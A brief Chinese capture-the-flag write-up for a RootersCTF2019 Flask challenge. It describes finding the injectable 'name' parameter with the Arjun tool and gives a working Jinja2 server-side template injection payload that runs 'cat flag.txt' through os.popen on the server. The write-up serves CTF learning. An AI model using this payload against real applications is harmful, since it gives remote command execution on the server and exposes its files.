WP

一道简单的SSTI，主要的难点还是找注入的参数。
学习了利用arjun这个HTTP参数发现工具：
Arjun
发现注入点是name参数。

然后简单的SSTI一下就可以了：

?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}}

标签：HTTP,name,Flask,SSTI,参数,RootersCTF2019,注入
来源： https://blog.csdn.net/rfrder/article/details/114442903